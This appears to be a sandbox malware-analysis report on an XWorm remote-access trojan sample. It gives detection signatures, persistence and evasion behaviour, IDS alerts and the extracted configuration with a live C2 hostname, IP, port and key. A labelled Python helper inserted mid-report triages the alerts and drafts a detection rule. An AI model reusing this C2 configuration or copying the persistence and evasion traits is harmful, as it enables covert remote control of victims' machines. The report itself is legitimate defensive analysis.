

Windows Analysis Report
17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe

Overview

General Information

Sample name: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
Analysis ID: 1546912
MD5: fb84f0c948174966776db1e4592fdc75
SHA1: 178b6ce2ddd9de88d5e6b39c212254b50d45cfd7
SHA256: 58e5f9caa04676b6269b870cc4aa3997287fd3a038d1df59e5bd2c41b75bbd62
Tags: base64-decoded, exe, user-abuse_ch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • cleanup

Extracted malware configuration (XWorm):
{"C2 url": ["browser-hazard.gl.at.ply.gg"], "Port": "2620", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara Overview

Initial sample (type: SAMPLE)
Source | Rule | Description | Author
17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x8140:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x81dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x82f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7dee:$cnc4: POST / HTTP/1.1

Dropped files (type: DROPPED)
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\x-manager.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\x-manager.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x8140:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x81dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x82f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7dee:$cnc4: POST / HTTP/1.1

Memory dumps (type: MEMORY)
Source | Rule | Description | Author
00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x7f40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7fdd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x80f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7bee:$cnc4: POST / HTTP/1.1
00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x9c00:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9c9d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9db2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x98ae:$cnc4: POST / HTTP/1.1
Process Memory Space: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe PID: 5224 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Unpacked PEs (type: UNPACKEDPE)
Source | Rule | Description | Author
0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x6340:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x63dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x64f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x5fee:$cnc4: POST / HTTP/1.1
0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x8140:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x81dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x82f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7dee:$cnc4: POST / HTTP/1.1
0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

                  System Summary

Sigma rule: Startup Folder File Write
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, ProcessId: 5224, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x-manager.lnk

Suricata alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T17:31:15.782631+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49731 | TCP
2024-11-01T17:31:55.570005+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49742 | TCP
2024-11-01T17:33:14.873431+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50014 | 147.185.221.23 | 2620 | TCP


                  AV Detection

Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\x-manager.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Malware Configuration Extractor: Xworm {"C2 url": ["browser-hazard.gl.at.ply.gg"], "Port": "2620", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\x-manager.exe | ReversingLabs: Detection: 84%
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | ReversingLabs: Detection: 84%
Source: Submitted sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\x-manager.exe | Joe Sandbox ML: detected
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Joe Sandbox ML: detected
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | String decryptor: browser-hazard.gl.at.ply.gg
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | String decryptor: 2620
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | String decryptor: <123456789>
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | String decryptor: <Xwormmm>
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | String decryptor: XWorm V5.6
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | String decryptor: USB.exe
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | String decryptor: %AppData%
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | String decryptor: x-manager.exe
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49829 -> 147.185.221.23:2620
Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:50014 -> 147.185.221.23:2620
Source: Malware configuration extractor | URLs: browser-hazard.gl.at.ply.gg
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 147.185.221.23:2620
Source: Joe Sandbox View | IP Address: 147.185.221.23
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49731
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49742
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: browser-hazard.gl.at.ply.gg
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4107271743.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
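The following triage helper is an added example and is not part of the Joe Sandbox report or of XWorm itself. It takes the configuration exactly as the report's extractor printed it, the three Suricata alert rows from the table above and the C2 IP the hostname resolved to during the run, and separates the alert that matches the configured C2 port (2620, outbound from the sandbox host) from the two inbound TCP/443 alerts that involve neither the configured hostname nor its IP. It also flattens the config into indicators and drafts a Suricata DNS-query rule for the C2 hostname. The function names, the pipe-separated row format and the rule text are assumptions of this example; the rule syntax is the Suricata `dns.query` sticky-buffer form and should be tested in a lab before deployment.

```python
"""Triage helper for the Suricata alerts and the extracted XWorm config above.

Added example, not part of the Joe Sandbox report. The config JSON and the three
alert rows are copied from the report; the C2 IP comes from the report's Networking
section. Function names, the row format and the DNS rule text are assumptions.
"""
import ipaddress
import json
from dataclasses import dataclass

# Configuration exactly as the report's "Malware Configuration Extractor" printed it.
XWORM_CONFIG = json.loads(
    '{"C2 url": ["browser-hazard.gl.at.ply.gg"], "Port": "2620", '
    '"Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", '
    '"Version": "XWorm V5.6"}'
)

# IP the C2 hostname resolved to during the run (Networking section of the report).
C2_IPS = {"147.185.221.23"}

# Alert rows as shown in the report's Suricata table, pipe-separated for parsing.
ALERT_ROWS = [
    "2024-11-01T17:31:15.782631+0100|2022930|1|A Network Trojan was detected|172.202.163.200|443|192.168.2.4|49731|TCP",
    "2024-11-01T17:31:55.570005+0100|2022930|1|A Network Trojan was detected|4.245.163.56|443|192.168.2.4|49742|TCP",
    "2024-11-01T17:33:14.873431+0100|2853193|1|Malware Command and Control Activity Detected|192.168.2.4|50014|147.185.221.23|2620|TCP",
]


@dataclass(frozen=True)
class Alert:
    ts: str
    sid: int
    severity: int
    classtype: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


def parse_alert(row: str) -> Alert:
    """Parse one pipe-separated row; SID, severity and ports become ints."""
    ts, sid, sev, cls, src, sport, dst, dport, proto = row.split("|")
    return Alert(ts, int(sid), int(sev), cls, src, int(sport), dst, int(dport), proto)


def _is_private(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_private


def classify(alert: Alert, cfg: dict, c2_ips: set[str]) -> str:
    """Label an alert by how it relates to the extracted config.

    'c2'      : sandbox host -> configured C2 port, and (when known) the resolved C2 IP
    'inbound' : external host on TCP/443 -> sandbox host; not the configured C2
    'other'   : anything else, left for manual review
    """
    c2_port = int(cfg["Port"])
    if _is_private(alert.src) and alert.dport == c2_port and (not c2_ips or alert.dst in c2_ips):
        return "c2"
    if _is_private(alert.dst) and not _is_private(alert.src) and alert.sport == 443:
        return "inbound"
    return "other"


def triage(rows: list[str], cfg: dict, c2_ips: set[str]) -> dict:
    """Return {label: [sid, ...]} for the given rows, in input order."""
    out = {"c2": [], "inbound": [], "other": []}
    for row in rows:
        alert = parse_alert(row)
        out[classify(alert, cfg, c2_ips)].append(alert.sid)
    return out


def iocs(cfg: dict, c2_ips: set[str]) -> dict:
    """Flatten the config into blockable / huntable indicators."""
    return {
        "domains": list(cfg["C2 url"]),
        "ips": sorted(c2_ips),
        "ports": [int(cfg["Port"])],
        "install_file": cfg["Install file"],
        "version": cfg["Version"],
    }


def dns_query_rule(domain: str, sid: int) -> str:
    """Draft a Suricata rule that fires on a DNS lookup of the C2 hostname (test before deploying)."""
    return (
        f'alert dns any any -> any any (msg:"XWorm C2 DNS lookup {domain}"; '
        f'dns.query; content:"{domain}"; nocase; sid:{sid}; rev:1;)'
    )


if __name__ == "__main__":
    print(triage(ALERT_ROWS, XWORM_CONFIG, C2_IPS))
    print(iocs(XWORM_CONFIG, C2_IPS))
    print(dns_query_rule(XWORM_CONFIG["C2 url"][0], 9000001))
```

Two caveats when hunting with this output: the config's "Install file" (USB.exe) differs from the name the sample actually installed under (%AppData%\x-manager.exe, see the String decryptor lines above), so hunt for both names; and the ETPRO rule names say "XWorm V3" while the config reports "XWorm V5.6", so key on the fact that the rule fired on this sample's traffic rather than on the version string.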

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: x-manager.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout

                  Operating System Destruction

Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Process information set: 01 00 00 00 (BreakOnTermination = 1: the process is marked critical, so terminating it triggers a bugcheck; this is the "Protects its processes via BreakOnTermination flag" signature above)

                  System Summary

Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, type: SAMPLE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\x-manager.exe, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Code function: 0_2_00007FFD9B889762
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Code function: 0_2_00007FFD9B8889B6
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Code function: 0_2_00007FFD9B8805A8
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000000.1664100465.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename: xworm.exe vs 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename: xworm.exe vs 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Binary or memory string: OriginalFilename: xworm.exe vs 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\x-manager.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: x-manager.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: x-manager.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: x-manager.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: x-manager.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: x-manager.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/3@1/1
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | File created: C:\Users\user\AppData\Roaming\x-manager.exe
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Mutant created: \Sessions\1\BaseNamedObjects\5fGznRuUj1JrT03R
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | File read: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: windows.storage.dll
